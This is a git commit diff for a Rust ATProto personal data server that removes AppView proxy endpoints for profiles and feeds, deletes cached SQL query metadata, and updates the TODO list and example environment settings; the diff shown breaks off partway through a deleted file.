Remove a bunch of unnecessary tests & endpoints

This commit is contained in:
lewis
2025-12-18 22:13:25 +02:00
parent 2cf87e2cfb
commit e929cf5af5
45 changed files with 2043 additions and 10554 deletions

View File

@@ -48,25 +48,13 @@ AWS_SECRET_ACCESS_KEY=minioadmin
# Optional: rotation key for PLC operations (defaults to user's key)
# PLC_ROTATION_KEY=did:key:...
# =============================================================================
# AppView Federation
# DID Resolution
# =============================================================================
# Cache TTL for resolved DID documents (default: 300 seconds)
# DID_CACHE_TTL_SECS=300
# =============================================================================
# Relays
# =============================================================================
# AppViews are resolved via DID-based discovery. Configure by mapping lexicon
# namespaces to AppView DIDs. The DID document is fetched and the service
# endpoint is extracted automatically.
#
# Format: APPVIEW_DID_<NAMESPACE>=<did>
# Where <NAMESPACE> uses underscores instead of dots (e.g., APP_BSKY for app.bsky)
#
# Default: app.bsky and com.atproto -> did:web:api.bsky.app
#
# Examples:
# APPVIEW_DID_APP_BSKY=did:web:api.bsky.app
# APPVIEW_DID_COM_WHTWND=did:web:whtwnd.com
# APPVIEW_DID_BLUE_ZIO=did:plc:some-custom-appview
#
# Cache TTL for resolved AppView endpoints (default: 300 seconds)
# APPVIEW_CACHE_TTL_SECS=300
#
# Comma-separated list of relay URLs to notify via requestCrawl
# CRAWLERS=https://bsky.network,https://relay.upcloud.world
# =============================================================================

View File

@@ -1,28 +0,0 @@
{
"db_name": "PostgreSQL",
"query": "SELECT key_bytes, encryption_version FROM user_keys k JOIN users u ON k.user_id = u.id WHERE u.did = $1",
"describe": {
"columns": [
{
"ordinal": 0,
"name": "key_bytes",
"type_info": "Bytea"
},
{
"ordinal": 1,
"name": "encryption_version",
"type_info": "Int4"
}
],
"parameters": {
"Left": [
"Text"
]
},
"nullable": [
false,
true
]
},
"hash": "36001fc127d7a3ea4e53e43a559cd86107e74d02ddcc499afd81049ce3c6789b"
}

View File

@@ -1,46 +0,0 @@
{
"db_name": "PostgreSQL",
"query": "SELECT r.record_cid, r.rkey, r.created_at, u.did, u.handle\n FROM records r\n JOIN repos rp ON r.repo_id = rp.user_id\n JOIN users u ON rp.user_id = u.id\n WHERE u.did = ANY($1) AND r.collection = 'app.bsky.feed.post'\n ORDER BY r.created_at DESC\n LIMIT 50",
"describe": {
"columns": [
{
"ordinal": 0,
"name": "record_cid",
"type_info": "Text"
},
{
"ordinal": 1,
"name": "rkey",
"type_info": "Text"
},
{
"ordinal": 2,
"name": "created_at",
"type_info": "Timestamptz"
},
{
"ordinal": 3,
"name": "did",
"type_info": "Text"
},
{
"ordinal": 4,
"name": "handle",
"type_info": "Text"
}
],
"parameters": {
"Left": [
"TextArray"
]
},
"nullable": [
false,
false,
false,
false,
false
]
},
"hash": "4bc1e1169d95eac340756b1ba01680caa980514d77cc7b41361c2400f6a5f456"
}

View File

@@ -1,23 +0,0 @@
{
"db_name": "PostgreSQL",
"query": "SELECT 1 as val FROM records WHERE repo_id = $1 AND repo_rev <= $2 LIMIT 1",
"describe": {
"columns": [
{
"ordinal": 0,
"name": "val",
"type_info": "Int4"
}
],
"parameters": {
"Left": [
"Uuid",
"Text"
]
},
"nullable": [
null
]
},
"hash": "5f02d646eb60f99f5cc1ae7b8b41e62d053a6b9f8e9452d5cef3526b8aef8288"
}

View File

@@ -1,22 +0,0 @@
{
"db_name": "PostgreSQL",
"query": "SELECT record_cid FROM records WHERE repo_id = $1 AND collection = 'app.bsky.actor.profile' AND rkey = 'self'",
"describe": {
"columns": [
{
"ordinal": 0,
"name": "record_cid",
"type_info": "Text"
}
],
"parameters": {
"Left": [
"Uuid"
]
},
"nullable": [
false
]
},
"hash": "94e290ff1acc15ccb8fd57fce25c7a4eea1e45c7339145d5af2741cc04348c8f"
}

View File

@@ -1,22 +0,0 @@
{
"db_name": "PostgreSQL",
"query": "SELECT record_cid FROM records WHERE repo_id = $1 AND collection = 'app.bsky.graph.follow' LIMIT 5000",
"describe": {
"columns": [
{
"ordinal": 0,
"name": "record_cid",
"type_info": "Text"
}
],
"parameters": {
"Left": [
"Uuid"
]
},
"nullable": [
false
]
},
"hash": "a3e7b0c0861eaf62dda8b3a2ea5573bbb64eef74473f2b73cb38e2948cb3d7cc"
}

View File

@@ -1,47 +0,0 @@
{
"db_name": "PostgreSQL",
"query": "\n SELECT record_cid, collection, rkey, created_at, repo_rev\n FROM records\n WHERE repo_id = $1 AND repo_rev > $2\n ORDER BY repo_rev ASC\n LIMIT 10\n ",
"describe": {
"columns": [
{
"ordinal": 0,
"name": "record_cid",
"type_info": "Text"
},
{
"ordinal": 1,
"name": "collection",
"type_info": "Text"
},
{
"ordinal": 2,
"name": "rkey",
"type_info": "Text"
},
{
"ordinal": 3,
"name": "created_at",
"type_info": "Timestamptz"
},
{
"ordinal": 4,
"name": "repo_rev",
"type_info": "Text"
}
],
"parameters": {
"Left": [
"Uuid",
"Text"
]
},
"nullable": [
false,
false,
false,
false,
true
]
},
"hash": "f3f1634b4f03a4c365afa02c4504de758bc420f49a19092d5cd1c526c7c7461e"
}

39
TODO.md
View File

@@ -38,19 +38,20 @@ Accounts controlled by other accounts rather than having their own password. Whe
- [ ] Log all actions with both actor DID and controller DID
- [ ] Audit log view for delegated account owners
### Passkey support
Modern passwordless authentication using WebAuthn/FIDO2, alongside or instead of passwords.
### Passkeys and 2FA
Modern passwordless authentication using WebAuthn/FIDO2, plus TOTP for defense in depth.
- [ ] passkeys table (id, did, credential_id, public_key, sign_count, created_at, last_used, friendly_name)
- [ ] Generate WebAuthn registration challenge
- [ ] Verify attestation response and store credential
- [ ] UI for registering new passkey from settings
- [ ] Detect if account has passkeys during OAuth authorize
- [ ] Offer passkey option alongside password
- [ ] Generate authentication challenge and verify assertion
- [ ] Update sign count (replay protection)
- [ ] Allow creating account with passkey instead of password
- [ ] List/rename/remove passkeys in settings
- [ ] user_totp table (did, secret_encrypted, verified, created_at, last_used)
- [ ] WebAuthn registration challenge generation and attestation verification
- [ ] TOTP secret generation with QR code setup flow
- [ ] Backup codes (hashed, one-time use) with recovery flow
- [ ] OAuth authorize flow: password → 2FA (if enabled) → passkey (as alternative)
- [ ] Passkey-only account creation (no password)
- [ ] Settings UI for managing passkeys, TOTP, backup codes
- [ ] Trusted devices option (remember this browser)
- [ ] Rate limit 2FA attempts
- [ ] Re-auth for sensitive actions (email change, adding new auth methods)
### Private/encrypted data
Records that only authorized parties can see and decrypt. Requires key federation between PDSes.
@@ -65,6 +66,22 @@ Records that only authorized parties can see and decrypt. Requires key federatio
- [ ] Protocol for sharing decryption keys between PDSes
- [ ] Handle key rotation and revocation
### Plugin system
Extensible architecture allowing third-party plugins to add functionality, like minecraft mods or browser extensions.
- [ ] Research: survey Fabric/Forge, VS Code, Grafana, Caddy plugin architectures
- [ ] Evaluate rust approaches: WASM, dynamic linking, subprocess IPC, embedded scripting (Lua/Rhai)
- [ ] Define security model (sandboxing, permissions, resource limits)
- [ ] Plugin manifest format (name, version, deps, permissions, hooks)
- [ ] Plugin discovery, loading, lifecycle (enable/disable/hot reload)
- [ ] Error isolation (bad plugin shouldn't crash PDS)
- [ ] Extension points: request middleware, record lifecycle hooks, custom XRPC endpoints
- [ ] Extension points: custom lexicons, storage backends, auth providers, notification channels
- [ ] Extension points: firehose consumers (react to repo events)
- [ ] Plugin SDK crate with traits and helpers
- [ ] Example plugins: custom feed algorithm, content filter, S3 backup
- [ ] Plugin registry with signature verification and version compatibility
---
## Completed

View File

@@ -1,5 +1,3 @@
mod preferences;
mod profile;
pub use preferences::{get_preferences, put_preferences};
pub use profile::{get_profile, get_profiles};

View File

@@ -1,290 +0,0 @@
use crate::api::proxy_client::proxy_client;
use crate::state::AppState;
use axum::{
Json,
extract::{Query, RawQuery, State},
http::StatusCode,
response::{IntoResponse, Response},
};
use jacquard_repo::storage::BlockStore;
use serde::{Deserialize, Serialize};
use serde_json::{Value, json};
use std::collections::HashMap;
use tracing::{error, info};
#[derive(Deserialize)]
pub struct GetProfileParams {
pub actor: String,
}
#[derive(Serialize, Deserialize, Clone)]
#[serde(rename_all = "camelCase")]
pub struct ProfileViewDetailed {
pub did: String,
pub handle: String,
#[serde(skip_serializing_if = "Option::is_none")]
pub display_name: Option<String>,
#[serde(skip_serializing_if = "Option::is_none")]
pub description: Option<String>,
#[serde(skip_serializing_if = "Option::is_none")]
pub avatar: Option<String>,
#[serde(skip_serializing_if = "Option::is_none")]
pub banner: Option<String>,
#[serde(flatten)]
pub extra: HashMap<String, Value>,
}
#[derive(Serialize, Deserialize)]
pub struct GetProfilesOutput {
pub profiles: Vec<ProfileViewDetailed>,
}
async fn get_local_profile_record(state: &AppState, did: &str) -> Option<Value> {
let user_id: uuid::Uuid = sqlx::query_scalar!("SELECT id FROM users WHERE did = $1", did)
.fetch_optional(&state.db)
.await
.ok()??;
let record_row = sqlx::query!(
"SELECT record_cid FROM records WHERE repo_id = $1 AND collection = 'app.bsky.actor.profile' AND rkey = 'self'",
user_id
)
.fetch_optional(&state.db)
.await
.ok()??;
let cid: cid::Cid = record_row.record_cid.parse().ok()?;
let block_bytes = state.block_store.get(&cid).await.ok()??;
serde_ipld_dagcbor::from_slice(&block_bytes).ok()
}
fn munge_profile_with_local(profile: &mut ProfileViewDetailed, local_record: &Value) {
if let Some(display_name) = local_record.get("displayName").and_then(|v| v.as_str()) {
profile.display_name = Some(display_name.to_string());
}
if let Some(description) = local_record.get("description").and_then(|v| v.as_str()) {
profile.description = Some(description.to_string());
}
}
async fn proxy_to_appview(
state: &AppState,
method: &str,
params: &HashMap<String, String>,
auth_did: &str,
auth_key_bytes: Option<&[u8]>,
) -> Result<(StatusCode, Value), Response> {
let resolved = match state.appview_registry.get_appview_for_method(method).await {
Some(r) => r,
None => {
return Err((
StatusCode::BAD_GATEWAY,
Json(
json!({"error": "UpstreamError", "message": "No upstream AppView configured"}),
),
)
.into_response());
}
};
let target_url = format!("{}/xrpc/{}", resolved.url, method);
info!("Proxying GET request to {}", target_url);
let client = proxy_client();
let request_builder = client.get(&target_url).query(params);
proxy_request(request_builder, auth_did, auth_key_bytes, method, &resolved.did).await
}
async fn proxy_to_appview_raw(
state: &AppState,
method: &str,
raw_query: Option<&str>,
auth_did: &str,
auth_key_bytes: Option<&[u8]>,
) -> Result<(StatusCode, Value), Response> {
let resolved = match state.appview_registry.get_appview_for_method(method).await {
Some(r) => r,
None => {
return Err((
StatusCode::BAD_GATEWAY,
Json(
json!({"error": "UpstreamError", "message": "No upstream AppView configured"}),
),
)
.into_response());
}
};
let target_url = match raw_query {
Some(q) => format!("{}/xrpc/{}?{}", resolved.url, method, q),
None => format!("{}/xrpc/{}", resolved.url, method),
};
info!("Proxying GET request to {}", target_url);
let client = proxy_client();
let request_builder = client.get(&target_url);
proxy_request(request_builder, auth_did, auth_key_bytes, method, &resolved.did).await
}
async fn proxy_request(
mut request_builder: reqwest::RequestBuilder,
auth_did: &str,
auth_key_bytes: Option<&[u8]>,
method: &str,
appview_did: &str,
) -> Result<(StatusCode, Value), Response> {
if let Some(key_bytes) = auth_key_bytes {
match crate::auth::create_service_token(auth_did, appview_did, method, key_bytes) {
Ok(service_token) => {
request_builder =
request_builder.header("Authorization", format!("Bearer {}", service_token));
}
Err(e) => {
error!("Failed to create service token: {:?}", e);
return Err((
StatusCode::INTERNAL_SERVER_ERROR,
Json(json!({"error": "InternalError"})),
)
.into_response());
}
}
}
match request_builder.send().await {
Ok(resp) => {
let status =
StatusCode::from_u16(resp.status().as_u16()).unwrap_or(StatusCode::BAD_GATEWAY);
match resp.json::<Value>().await {
Ok(body) => Ok((status, body)),
Err(e) => {
error!("Error parsing proxy response: {:?}", e);
Err((
StatusCode::BAD_GATEWAY,
Json(json!({"error": "UpstreamError"})),
)
.into_response())
}
}
}
Err(e) => {
error!("Error sending proxy request: {:?}", e);
if e.is_timeout() {
Err((
StatusCode::GATEWAY_TIMEOUT,
Json(json!({"error": "UpstreamTimeout"})),
)
.into_response())
} else {
Err((
StatusCode::BAD_GATEWAY,
Json(json!({"error": "UpstreamError"})),
)
.into_response())
}
}
}
}
pub async fn get_profile(
State(state): State<AppState>,
headers: axum::http::HeaderMap,
Query(params): Query<GetProfileParams>,
) -> Response {
let auth_header = headers.get("Authorization").and_then(|h| h.to_str().ok());
let auth_user = if let Some(h) = auth_header {
if let Some(token) = crate::auth::extract_bearer_token_from_header(Some(h)) {
crate::auth::validate_bearer_token(&state.db, &token)
.await
.ok()
} else {
None
}
} else {
None
};
let auth_did = auth_user.as_ref().map(|u| u.did.clone());
let auth_key_bytes = auth_user.as_ref().and_then(|u| u.key_bytes.clone());
let mut query_params = HashMap::new();
query_params.insert("actor".to_string(), params.actor.clone());
let (status, body) = match proxy_to_appview(
&state,
"app.bsky.actor.getProfile",
&query_params,
auth_did.as_deref().unwrap_or(""),
auth_key_bytes.as_deref(),
)
.await
{
Ok(r) => r,
Err(e) => return e,
};
if !status.is_success() {
return (status, Json(body)).into_response();
}
let mut profile: ProfileViewDetailed = match serde_json::from_value(body) {
Ok(p) => p,
Err(_) => {
return (
StatusCode::BAD_GATEWAY,
Json(json!({"error": "UpstreamError", "message": "Invalid profile response"})),
)
.into_response();
}
};
if let Some(ref did) = auth_did
&& profile.did == *did
&& let Some(local_record) = get_local_profile_record(&state, did).await {
munge_profile_with_local(&mut profile, &local_record);
}
(StatusCode::OK, Json(profile)).into_response()
}
pub async fn get_profiles(
State(state): State<AppState>,
headers: axum::http::HeaderMap,
RawQuery(raw_query): RawQuery,
) -> Response {
let auth_header = headers.get("Authorization").and_then(|h| h.to_str().ok());
let auth_user = if let Some(h) = auth_header {
if let Some(token) = crate::auth::extract_bearer_token_from_header(Some(h)) {
crate::auth::validate_bearer_token(&state.db, &token)
.await
.ok()
} else {
None
}
} else {
None
};
let auth_did = auth_user.as_ref().map(|u| u.did.clone());
let auth_key_bytes = auth_user.as_ref().and_then(|u| u.key_bytes.clone());
let (status, body) = match proxy_to_appview_raw(
&state,
"app.bsky.actor.getProfiles",
raw_query.as_deref(),
auth_did.as_deref().unwrap_or(""),
auth_key_bytes.as_deref(),
)
.await
{
Ok(r) => r,
Err(e) => return e,
};
if !status.is_success() {
return (status, Json(body)).into_response();
}
let mut output: GetProfilesOutput = match serde_json::from_value(body) {
Ok(p) => p,
Err(_) => {
return (
StatusCode::BAD_GATEWAY,
Json(json!({"error": "UpstreamError", "message": "Invalid profiles response"})),
)
.into_response();
}
};
if let Some(ref did) = auth_did {
for profile in &mut output.profiles {
if profile.did == *did {
if let Some(local_record) = get_local_profile_record(&state, did).await {
munge_profile_with_local(profile, &local_record);
}
break;
}
}
}
(StatusCode::OK, Json(output)).into_response()
}

View File

@@ -1,158 +0,0 @@
use crate::api::read_after_write::{
FeedOutput, FeedViewPost, LikeRecord, PostView, RecordDescript, extract_repo_rev,
format_munged_response, get_local_lag, get_records_since_rev, proxy_to_appview_via_registry,
};
use crate::state::AppState;
use axum::{
Json,
extract::{Query, State},
http::StatusCode,
response::{IntoResponse, Response},
};
use serde::Deserialize;
use serde_json::Value;
use std::collections::HashMap;
use tracing::warn;
#[derive(Deserialize)]
pub struct GetActorLikesParams {
pub actor: String,
pub limit: Option<u32>,
pub cursor: Option<String>,
}
fn insert_likes_into_feed(feed: &mut Vec<FeedViewPost>, likes: &[RecordDescript<LikeRecord>]) {
for like in likes {
let like_time = &like.indexed_at.to_rfc3339();
let idx = feed
.iter()
.position(|fi| &fi.post.indexed_at < like_time)
.unwrap_or(feed.len());
let placeholder_post = PostView {
uri: like.record.subject.uri.clone(),
cid: like.record.subject.cid.clone(),
author: crate::api::read_after_write::AuthorView {
did: String::new(),
handle: String::new(),
display_name: None,
avatar: None,
extra: HashMap::new(),
},
record: Value::Null,
indexed_at: like.indexed_at.to_rfc3339(),
embed: None,
reply_count: 0,
repost_count: 0,
like_count: 0,
quote_count: 0,
extra: HashMap::new(),
};
feed.insert(
idx,
FeedViewPost {
post: placeholder_post,
reply: None,
reason: None,
feed_context: None,
extra: HashMap::new(),
},
);
}
}
pub async fn get_actor_likes(
State(state): State<AppState>,
headers: axum::http::HeaderMap,
Query(params): Query<GetActorLikesParams>,
) -> Response {
let auth_header = headers.get("Authorization").and_then(|h| h.to_str().ok());
let auth_user = if let Some(h) = auth_header {
if let Some(token) = crate::auth::extract_bearer_token_from_header(Some(h)) {
crate::auth::validate_bearer_token(&state.db, &token)
.await
.ok()
} else {
None
}
} else {
None
};
let auth_did = auth_user.as_ref().map(|u| u.did.clone());
let auth_key_bytes = auth_user.as_ref().and_then(|u| u.key_bytes.clone());
let mut query_params = HashMap::new();
query_params.insert("actor".to_string(), params.actor.clone());
if let Some(limit) = params.limit {
query_params.insert("limit".to_string(), limit.to_string());
}
if let Some(cursor) = &params.cursor {
query_params.insert("cursor".to_string(), cursor.clone());
}
let proxy_result = match proxy_to_appview_via_registry(
&state,
"app.bsky.feed.getActorLikes",
&query_params,
auth_did.as_deref().unwrap_or(""),
auth_key_bytes.as_deref(),
)
.await
{
Ok(r) => r,
Err(e) => return e,
};
if !proxy_result.status.is_success() {
return proxy_result.into_response();
}
let rev = match extract_repo_rev(&proxy_result.headers) {
Some(r) => r,
None => return proxy_result.into_response(),
};
let mut feed_output: FeedOutput = match serde_json::from_slice(&proxy_result.body) {
Ok(f) => f,
Err(e) => {
warn!("Failed to parse actor likes response: {:?}", e);
return proxy_result.into_response();
}
};
let requester_did = match &auth_did {
Some(d) => d.clone(),
None => return (StatusCode::OK, Json(feed_output)).into_response(),
};
let actor_did = if params.actor.starts_with("did:") {
params.actor.clone()
} else {
let hostname = std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string());
let suffix = format!(".{}", hostname);
let short_handle = if params.actor.ends_with(&suffix) {
params.actor.strip_suffix(&suffix).unwrap_or(&params.actor)
} else {
&params.actor
};
match sqlx::query_scalar!("SELECT did FROM users WHERE handle = $1", short_handle)
.fetch_optional(&state.db)
.await
{
Ok(Some(did)) => did,
Ok(None) => return (StatusCode::OK, Json(feed_output)).into_response(),
Err(e) => {
warn!("Database error resolving actor handle: {:?}", e);
return proxy_result.into_response();
}
}
};
if actor_did != requester_did {
return (StatusCode::OK, Json(feed_output)).into_response();
}
let local_records = match get_records_since_rev(&state, &requester_did, &rev).await {
Ok(r) => r,
Err(e) => {
warn!("Failed to get local records: {}", e);
return proxy_result.into_response();
}
};
if local_records.likes.is_empty() {
return (StatusCode::OK, Json(feed_output)).into_response();
}
insert_likes_into_feed(&mut feed_output.feed, &local_records.likes);
let lag = get_local_lag(&local_records);
format_munged_response(feed_output, lag)
}

View File

@@ -1,160 +0,0 @@
use crate::api::read_after_write::{
FeedOutput, FeedViewPost, ProfileRecord, RecordDescript, extract_repo_rev, format_local_post,
format_munged_response, get_local_lag, get_records_since_rev, insert_posts_into_feed,
proxy_to_appview_via_registry,
};
use crate::state::AppState;
use axum::{
Json,
extract::{Query, State},
http::StatusCode,
response::{IntoResponse, Response},
};
use serde::Deserialize;
use std::collections::HashMap;
use tracing::warn;
#[derive(Deserialize)]
pub struct GetAuthorFeedParams {
pub actor: String,
pub limit: Option<u32>,
pub cursor: Option<String>,
pub filter: Option<String>,
#[serde(rename = "includePins")]
pub include_pins: Option<bool>,
}
fn update_author_profile_in_feed(
feed: &mut [FeedViewPost],
author_did: &str,
local_profile: &RecordDescript<ProfileRecord>,
) {
for item in feed.iter_mut() {
if item.post.author.did == author_did
&& let Some(ref display_name) = local_profile.record.display_name {
item.post.author.display_name = Some(display_name.clone());
}
}
}
pub async fn get_author_feed(
State(state): State<AppState>,
headers: axum::http::HeaderMap,
Query(params): Query<GetAuthorFeedParams>,
) -> Response {
let auth_header = headers.get("Authorization").and_then(|h| h.to_str().ok());
let auth_user = if let Some(h) = auth_header {
if let Some(token) = crate::auth::extract_bearer_token_from_header(Some(h)) {
crate::auth::validate_bearer_token(&state.db, &token)
.await
.ok()
} else {
None
}
} else {
None
};
let auth_did = auth_user.as_ref().map(|u| u.did.clone());
let auth_key_bytes = auth_user.as_ref().and_then(|u| u.key_bytes.clone());
let mut query_params = HashMap::new();
query_params.insert("actor".to_string(), params.actor.clone());
if let Some(limit) = params.limit {
query_params.insert("limit".to_string(), limit.to_string());
}
if let Some(cursor) = &params.cursor {
query_params.insert("cursor".to_string(), cursor.clone());
}
if let Some(filter) = &params.filter {
query_params.insert("filter".to_string(), filter.clone());
}
if let Some(include_pins) = params.include_pins {
query_params.insert("includePins".to_string(), include_pins.to_string());
}
let proxy_result = match proxy_to_appview_via_registry(
&state,
"app.bsky.feed.getAuthorFeed",
&query_params,
auth_did.as_deref().unwrap_or(""),
auth_key_bytes.as_deref(),
)
.await
{
Ok(r) => r,
Err(e) => return e,
};
if !proxy_result.status.is_success() {
return proxy_result.into_response();
}
let rev = match extract_repo_rev(&proxy_result.headers) {
Some(r) => r,
None => return proxy_result.into_response(),
};
let mut feed_output: FeedOutput = match serde_json::from_slice(&proxy_result.body) {
Ok(f) => f,
Err(e) => {
warn!("Failed to parse author feed response: {:?}", e);
return proxy_result.into_response();
}
};
let requester_did = match &auth_did {
Some(d) => d.clone(),
None => return (StatusCode::OK, Json(feed_output)).into_response(),
};
let actor_did = if params.actor.starts_with("did:") {
params.actor.clone()
} else {
let hostname = std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string());
let suffix = format!(".{}", hostname);
let short_handle = if params.actor.ends_with(&suffix) {
params.actor.strip_suffix(&suffix).unwrap_or(&params.actor)
} else {
&params.actor
};
match sqlx::query_scalar!("SELECT did FROM users WHERE handle = $1", short_handle)
.fetch_optional(&state.db)
.await
{
Ok(Some(did)) => did,
Ok(None) => return (StatusCode::OK, Json(feed_output)).into_response(),
Err(e) => {
warn!("Database error resolving actor handle: {:?}", e);
return proxy_result.into_response();
}
}
};
if actor_did != requester_did {
return (StatusCode::OK, Json(feed_output)).into_response();
}
let local_records = match get_records_since_rev(&state, &requester_did, &rev).await {
Ok(r) => r,
Err(e) => {
warn!("Failed to get local records: {}", e);
return proxy_result.into_response();
}
};
if local_records.count == 0 {
return (StatusCode::OK, Json(feed_output)).into_response();
}
let handle = match sqlx::query_scalar!("SELECT handle FROM users WHERE did = $1", requester_did)
.fetch_optional(&state.db)
.await
{
Ok(Some(h)) => h,
Ok(None) => requester_did.clone(),
Err(e) => {
warn!("Database error fetching handle: {:?}", e);
requester_did.clone()
}
};
if let Some(ref local_profile) = local_records.profile {
update_author_profile_in_feed(&mut feed_output.feed, &requester_did, local_profile);
}
let local_posts: Vec<_> = local_records
.posts
.iter()
.map(|p| format_local_post(p, &requester_did, &handle, local_records.profile.as_ref()))
.collect();
insert_posts_into_feed(&mut feed_output.feed, local_posts);
let lag = get_local_lag(&local_records);
format_munged_response(feed_output, lag)
}

View File

@@ -1,131 +0,0 @@
use crate::api::ApiError;
use crate::api::proxy_client::{
MAX_RESPONSE_SIZE, is_ssrf_safe, proxy_client, validate_at_uri, validate_limit,
};
use crate::state::AppState;
use axum::{
extract::{Query, State},
http::StatusCode,
response::{IntoResponse, Response},
};
use serde::Deserialize;
use std::collections::HashMap;
use tracing::{error, info};
#[derive(Deserialize)]
pub struct GetFeedParams {
pub feed: String,
pub limit: Option<u32>,
pub cursor: Option<String>,
}
pub async fn get_feed(
State(state): State<AppState>,
headers: axum::http::HeaderMap,
Query(params): Query<GetFeedParams>,
) -> Response {
let token = match crate::auth::extract_bearer_token_from_header(
headers.get("Authorization").and_then(|h| h.to_str().ok()),
) {
Some(t) => t,
None => return ApiError::AuthenticationRequired.into_response(),
};
let auth_user = match crate::auth::validate_bearer_token(&state.db, &token).await {
Ok(user) => user,
Err(e) => return ApiError::from(e).into_response(),
};
if let Err(e) = validate_at_uri(&params.feed) {
return ApiError::InvalidRequest(format!("Invalid feed URI: {}", e)).into_response();
}
let resolved = match state.appview_registry.get_appview_for_method("app.bsky.feed.getFeed").await {
Some(r) => r,
None => {
return ApiError::UpstreamUnavailable("No upstream AppView configured for app.bsky.feed.getFeed".to_string())
.into_response();
}
};
if let Err(e) = is_ssrf_safe(&resolved.url) {
error!("SSRF check failed for appview URL: {}", e);
return ApiError::UpstreamUnavailable(format!("Invalid upstream URL: {}", e))
.into_response();
}
let limit = validate_limit(params.limit, 50, 100);
let mut query_params = HashMap::new();
query_params.insert("feed".to_string(), params.feed.clone());
query_params.insert("limit".to_string(), limit.to_string());
if let Some(cursor) = &params.cursor {
query_params.insert("cursor".to_string(), cursor.clone());
}
let target_url = format!("{}/xrpc/app.bsky.feed.getFeed", resolved.url);
info!(target = %target_url, feed = %params.feed, "Proxying getFeed request");
let client = proxy_client();
let mut request_builder = client.get(&target_url).query(&query_params);
if let Some(key_bytes) = auth_user.key_bytes.as_ref() {
match crate::auth::create_service_token(
&auth_user.did,
&resolved.did,
"app.bsky.feed.getFeed",
key_bytes,
) {
Ok(service_token) => {
request_builder =
request_builder.header("Authorization", format!("Bearer {}", service_token));
}
Err(e) => {
error!(error = ?e, "Failed to create service token for getFeed");
return ApiError::InternalError.into_response();
}
}
}
match request_builder.send().await {
Ok(resp) => {
let status =
StatusCode::from_u16(resp.status().as_u16()).unwrap_or(StatusCode::BAD_GATEWAY);
let content_length = resp.content_length().unwrap_or(0);
if content_length > MAX_RESPONSE_SIZE {
error!(
content_length,
max = MAX_RESPONSE_SIZE,
"getFeed response too large"
);
return ApiError::UpstreamFailure.into_response();
}
let resp_headers = resp.headers().clone();
let body = match resp.bytes().await {
Ok(b) => {
if b.len() as u64 > MAX_RESPONSE_SIZE {
error!(len = b.len(), "getFeed response body exceeded limit");
return ApiError::UpstreamFailure.into_response();
}
b
}
Err(e) => {
error!(error = ?e, "Error reading getFeed response");
return ApiError::UpstreamFailure.into_response();
}
};
let mut response_builder = axum::response::Response::builder().status(status);
if let Some(ct) = resp_headers.get("content-type") {
response_builder = response_builder.header("content-type", ct);
}
match response_builder.body(axum::body::Body::from(body)) {
Ok(r) => r,
Err(e) => {
error!(error = ?e, "Error building getFeed response");
ApiError::UpstreamFailure.into_response()
}
}
}
Err(e) => {
error!(error = ?e, "Error proxying getFeed");
if e.is_timeout() {
ApiError::UpstreamTimeout.into_response()
} else if e.is_connect() {
ApiError::UpstreamUnavailable("Failed to connect to upstream".to_string())
.into_response()
} else {
ApiError::UpstreamFailure.into_response()
}
}
}
}

View File

@@ -1,11 +0,0 @@
mod actor_likes;
mod author_feed;
mod custom_feed;
mod post_thread;
mod timeline;
pub use actor_likes::get_actor_likes;
pub use author_feed::get_author_feed;
pub use custom_feed::get_feed;
pub use post_thread::get_post_thread;
pub use timeline::get_timeline;

View File

@@ -1,315 +0,0 @@
use crate::api::read_after_write::{
PostRecord, PostView, RecordDescript, extract_repo_rev, format_local_post,
format_munged_response, get_local_lag, get_records_since_rev, proxy_to_appview_via_registry,
};
use crate::state::AppState;
use axum::{
Json,
extract::{Query, State},
http::StatusCode,
response::{IntoResponse, Response},
};
use serde::{Deserialize, Serialize};
use serde_json::{Value, json};
use std::collections::HashMap;
use tracing::warn;
#[derive(Deserialize)]
pub struct GetPostThreadParams {
pub uri: String,
pub depth: Option<u32>,
#[serde(rename = "parentHeight")]
pub parent_height: Option<u32>,
}
#[derive(Debug, Clone, Serialize, Deserialize)]
#[serde(rename_all = "camelCase")]
pub struct ThreadViewPost {
#[serde(rename = "$type")]
pub thread_type: Option<String>,
pub post: PostView,
#[serde(skip_serializing_if = "Option::is_none")]
pub parent: Option<Box<ThreadNode>>,
#[serde(skip_serializing_if = "Option::is_none")]
pub replies: Option<Vec<ThreadNode>>,
#[serde(flatten)]
pub extra: HashMap<String, Value>,
}
#[derive(Debug, Clone, Serialize, Deserialize)]
#[serde(untagged)]
pub enum ThreadNode {
Post(Box<ThreadViewPost>),
NotFound(ThreadNotFound),
Blocked(ThreadBlocked),
}
#[derive(Debug, Clone, Serialize, Deserialize)]
#[serde(rename_all = "camelCase")]
pub struct ThreadNotFound {
#[serde(rename = "$type")]
pub thread_type: String,
pub uri: String,
pub not_found: bool,
}
#[derive(Debug, Clone, Serialize, Deserialize)]
#[serde(rename_all = "camelCase")]
pub struct ThreadBlocked {
#[serde(rename = "$type")]
pub thread_type: String,
pub uri: String,
pub blocked: bool,
pub author: Value,
}
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct PostThreadOutput {
pub thread: ThreadNode,
#[serde(skip_serializing_if = "Option::is_none")]
pub threadgate: Option<Value>,
}
const MAX_THREAD_DEPTH: usize = 10;
fn add_replies_to_thread(
thread: &mut ThreadViewPost,
local_posts: &[RecordDescript<PostRecord>],
author_did: &str,
author_handle: &str,
depth: usize,
) {
if depth >= MAX_THREAD_DEPTH {
return;
}
let thread_uri = &thread.post.uri;
let replies: Vec<_> = local_posts
.iter()
.filter(|p| {
p.record
.reply
.as_ref()
.and_then(|r| r.get("parent"))
.and_then(|parent| parent.get("uri"))
.and_then(|u| u.as_str())
== Some(thread_uri)
})
.map(|p| {
let post_view = format_local_post(p, author_did, author_handle, None);
ThreadNode::Post(Box::new(ThreadViewPost {
thread_type: Some("app.bsky.feed.defs#threadViewPost".to_string()),
post: post_view,
parent: None,
replies: None,
extra: HashMap::new(),
}))
})
.collect();
if !replies.is_empty() {
match &mut thread.replies {
Some(existing) => existing.extend(replies),
None => thread.replies = Some(replies),
}
}
if let Some(ref mut existing_replies) = thread.replies {
for reply in existing_replies.iter_mut() {
if let ThreadNode::Post(reply_thread) = reply {
add_replies_to_thread(
reply_thread,
local_posts,
author_did,
author_handle,
depth + 1,
);
}
}
}
}
pub async fn get_post_thread(
State(state): State<AppState>,
headers: axum::http::HeaderMap,
Query(params): Query<GetPostThreadParams>,
) -> Response {
let auth_header = headers.get("Authorization").and_then(|h| h.to_str().ok());
let auth_user = if let Some(h) = auth_header {
